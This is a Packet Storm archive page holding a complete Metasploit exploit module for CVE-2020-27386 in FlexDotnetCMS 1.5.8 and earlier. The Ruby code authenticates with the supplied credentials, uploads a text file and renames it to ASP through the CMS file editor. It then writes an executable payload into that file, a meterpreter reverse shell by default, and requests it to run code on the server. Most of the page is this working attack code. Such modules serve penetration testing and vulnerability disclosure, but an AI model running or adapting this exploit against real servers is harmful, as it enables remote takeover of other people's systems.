exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FlexDotnetCMS 1.5.8 Arbitrary ASP File Upload

FlexDotnetCMS 1.5.8 Arbitrary ASP File Upload
Posted Dec 8, 2020
Authored by Erik Wynter | Site metasploit.com

This Metasploit module exploits an arbitrary file upload vulnerability in FlexDotnetCMS versions 1.5.8 and prior in order to execute arbitrary commands with elevated privileges.

tags | exploit, arbitrary, file upload
advisories | CVE-2020-27386
SHA-256 | 47b81343e2c7ec2c740cde41827515920f9357ae6d5bec55de8ab24845c398f4

FlexDotnetCMS 1.5.8 Arbitrary ASP File Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'FlexDotnetCMS Arbitrary ASP File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in
FlexDotnetCMS v1.5.8 and prior in order to execute arbitrary
commands with elevated privileges.

The module first tries to authenticate to FlexDotnetCMS via an HTTP
POST request to `/login`. It then attempts to upload a random TXT
file and subsequently uses the FlexDotnetCMS file editor to rename
the TXT file to an ASP file. If this succeeds, the target is
vulnerable and the ASP file is generated as a copy of the TXT file,
which remains on the server.

Next, the module sends another request to rename the TXT file to an
ASP file, this time adding the payload. Finally, the module tries
to execute the ASP payload via a simple HTTP GET request to
`/media/uploads/asp_payload`

Valid credentials for a FlexDotnetCMS user with permissions to use
the FileManager are required. This module has been successfully
tested against FlexDotnetCMS v1.5.8 running on Windows Server 2012.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Erik Wynter' # @wyntererik - Discovery & Metasploit
],
'References' =>
[
['CVE', '2020-27386'],
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows (x86)', {
'Arch' => [ARCH_X86],
'DefaultOptions' => {
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
}
}
],
[
'Windows (x64)', {
'Arch' => [ARCH_X64],
'DefaultOptions' => {
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
}
}
]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => '2020-09-28'
)
)

register_options [
OptString.new('TARGETURI', [true, 'The base path to FlexDotnetCMS', '/']),
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
]
end

def rename_file(res, payload)
# obtain tokens required for renaming the payload
html = res.get_html_document
viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')
event_validation = html.at('input[@id="__EVENTVALIDATION"]')
if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values
return 'no_tokens'
end

viewstate_key = viewstate_key['value']
event_validation = event_validation['value']

# rename TXT payload to ASP using the file editor, this creates a copy of the TXT file, so both have to be deleted (this happens in cleanup)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),
'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" },
'vars_post' => {
'__EVENTTARGET' => 'ctl00$ContentPlaceHolder1$Save',
'__VIEWSTATEKEY' => viewstate_key,
'__EVENTVALIDATION' => event_validation,
'ctl00$ContentPlaceHolder1$FileSelector$SelectedFile' => "/media/uploads/#{@payload_asp}",
'ctl00$ContentPlaceHolder1$Editor' => payload
}
})
end

def check
# used to ensure cleanup only runs against flexdotnetcms targets
@skip_cleanup = true

# visit login the page to get the necessary cookies
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'login/'),
'keep_cookies' => true
})

unless res
return CheckCode::Unknown('Connection failed')
end

# the login page doesn't contain the name of the app or the author, so we're combining a bunch of checks to limit the odds of failing to flag an incorrect target
unless res.code == 200 && res.body.include?('<title>Login - Home</title>') && res.body.include?('<label>Email</label><br>') && res.body.include?('>Forgot my password</a>')
return CheckCode::Safe('Target is not a FlexDotnetCMS application.')
end

# get cookies and tokens necessary for authentication
html = res.get_html_document
viewstate_key = html.at('input[@id="__VIEWSTATEKEY"]')
event_validation = html.at('input[@id="__EVENTVALIDATION"]')
if viewstate_key.blank? || event_validation.blank? # check if tokens exist before calling their values
return CheckCode::Detected('Received unexpected response while trying to obtain tokens necessary for authentication from /login')
end

viewstate_key = viewstate_key['value']
event_validation = event_validation['value']

# perform login to verify if the target is a FlexDotnetCMS application
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login/'),
'keep_cookies' => true,
'vars_post' => {
# ideally the % in the line below would not be encoded, but I don't know how to achieve that without reverting to send_request_raw, which is ugly, and this works
'LoginControl$ctl00' => 'LoginControl$ctl01%7CLoginControl$LoginButton',
'__EVENTTARGET' => 'LoginControl$LoginButton',
'__VIEWSTATEKEY' => viewstate_key,
'LoginControl$Username' => datastore['USERNAME'],
'LoginControl$Password' => datastore['PASSWORD'],
'__EVENTVALIDATION' => event_validation,
'__ASYNCPOST' => 'true'
}
})

unless res
return CheckCode::Detected('Connection failed')
end

unless res.code == 200 && res.body.include?('pageRedirect||%2fadmin')
return CheckCode::Detected('Failed to authenticate to the server.')
end

# visit the backend dashboard
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'Admin/')

unless res
return CheckCode::Detected('Connection failed')
end

unless res.code == 200 && res.body.include?('Welcome to your site editor:')
return CheckCode::Detected('Received unexpected response while trying to follow redirect to /Admin/')
end

print_good('Successfully authenticated to FlexDotnetCMS')

# prepare to upload a TXT file and rename it to an ASP file. If this works, the target is vulnerable.
# generate file names and post data
@payload_txt = "#{rand_text_alphanumeric(6..10)}.txt"
@payload_asp = @payload_txt.split('.txt')[0] << '.asp'
post_data = Rex::MIME::Message.new
post_data.add_part('\\media\\uploads\\', nil, nil, 'form-data; name="folder"')
post_data.add_part(rand_text_alpha(10..20), 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{@payload_txt}\"")

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'Scripts', 'tinyfilemanager.net', 'dialog.aspx'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'headers' => {
'Accept' => 'application/json',
'X-Requested-With' => 'XMLHttpRequest',
'X-File-Name' => @payload_txt
},
'vars_get' => {
'cmd' => 'upload'
},
'data' => post_data.to_s
})

@skip_cleanup = false # cleanup only has to run if at least one attempt to upload a file has been made

vprint_status("Uploading test file #{@payload_txt}...")

unless res
return CheckCode::Detected("Connection failed while trying to upload test file #{@payload_txt}")
end

unless res.code == 200
return CheckCode::Detected("Received unexpected response while trying to upload test file #{@payload_txt}")
end

# load the test file in the file editor in order to obtain tokens required for renaming it
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),
'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" }
})

unless res
return CheckCode::Detected("Connection failed while trying to open test file #{@payload_txt} in the file editor")
end

unless res.code == 200 && res.body.include?('Successfully loaded file')
return CheckCode::Detected("Received unexpected response while trying to open test file #{@payload_txt} in the file editor")
end

# FlexDotNetCMS displays the full installation path on the server in response to the previous GET request, so we can print it
flexdotnetcms_path = res.body.scan(/jQuery\.jGrowl\(\"Successfully loaded file \( (.*?)WebApplication/).flatten.first
unless flexdotnetcms_path.blank?
print_status("FlexDotnetCMS is installed on the target at #{flexdotnetcms_path}")
end

print_status("Uploaded test file #{@payload_txt}. Attempting to rename the file to #{@payload_asp}...")
res = rename_file(res, rand_text_alpha(10..20))
if res == 'no_tokens'
return CheckCode::Detected("Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}")
end

unless res
return CheckCode::Detected("Connection failed while trying to rename the test file #{@payload_txt}.")
end

unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}")
vprint_status("Failed to use the file editor to rename test file #{@payload_txt} to #{@payload_asp}")
return CheckCode::Safe('Target is FlexDotnetCMS v1.5.9 or higher')
end

print_good("Successfully renamed test file #{@payload_txt} to #{@payload_asp} (this is a copy of #{@payload_txt}, which remains on the server)")

return CheckCode::Vulnerable('Target is FlexDotnetCMS v1.5.8 or lower.')
end

def rename_test_file_and_add_payload
print_status("Renaming #{@payload_txt} to #{@payload_asp} again, this time adding the payload")

# load the file in the file editor in order to obtain tokens required for renaming it
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'Admin', 'Views', 'PageHandlers', 'FileEditor', 'Default.aspx'),
'vars_get' => { 'LoadFile' => "/media/uploads/#{@payload_txt}" }
})

unless res
fail_with(Failure::Disconnected, "Connection failed while trying to open #{@payload_txt} in the file editor")
end

unless res.code == 200 && res.body.include?('Successfully loaded file')
fail_with(Failure::UnexpectedReply, "Received unexpected response while trying to open #{@payload_txt} in the file editor")
end

# genenerate ASP payload, then rename the TXT file again while adding the payload
exe = generate_payload_exe
payload = Msf::Util::EXE.to_exe_asp(exe).to_s
res = rename_file(res, payload)
if res == 'no_tokens'
fail_with(Failure::UnexpectedReply, "Received unexpected response while trying to obtain tokens necessary for renaming #{@payload_txt}")
end

unless res
fail_with(Failure::Disconnected, 'Connection failed while trying to add the ASP payload.')
end

unless res.code == 200 && res.body.include?('jQuery.jGrowl("Successfully saved') && res.body.include?("/media/uploads/#{@payload_asp}")
fail_with(Failure::Unknown, 'Failed to add the ASP payload.')
end

print_good("Successfully added the ASP payload to #{@payload_asp}")
end

def cleanup
# only run when at least one attempt to upload a file has been made
return if @skip_cleanup

# delete uploaded TXT and ASP files
[@payload_txt, @payload_asp].each do |file|
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'Scripts', 'tinyfilemanager.net', 'dialog.aspx'),
'vars_get' => {
'cmd' => 'delfile',
'file' => "\\media\\uploads\\#{file}",
'currpath' => '\\media\\uploads\\'
}
})

unless res && res.code == 200 && res.body.exclude?(file)
print_error("Failed to delete #{file}.")
print_warning("Manual cleanup of #{file} is required.")
return
end

print_good("Successfully deleted #{file}")
end
end

def exploit
rename_test_file_and_add_payload
print_status('Executing the payload...')
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'media', 'uploads', @payload_asp.to_s)

unless res
fail_with(Failure::Disconnected, 'Connection failed while trying to execute the payload.')
end

unless res.code == 200
fail_with(Failure::UnexpectedReply, 'Received unexpected response while trying to execute the payload')
end
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close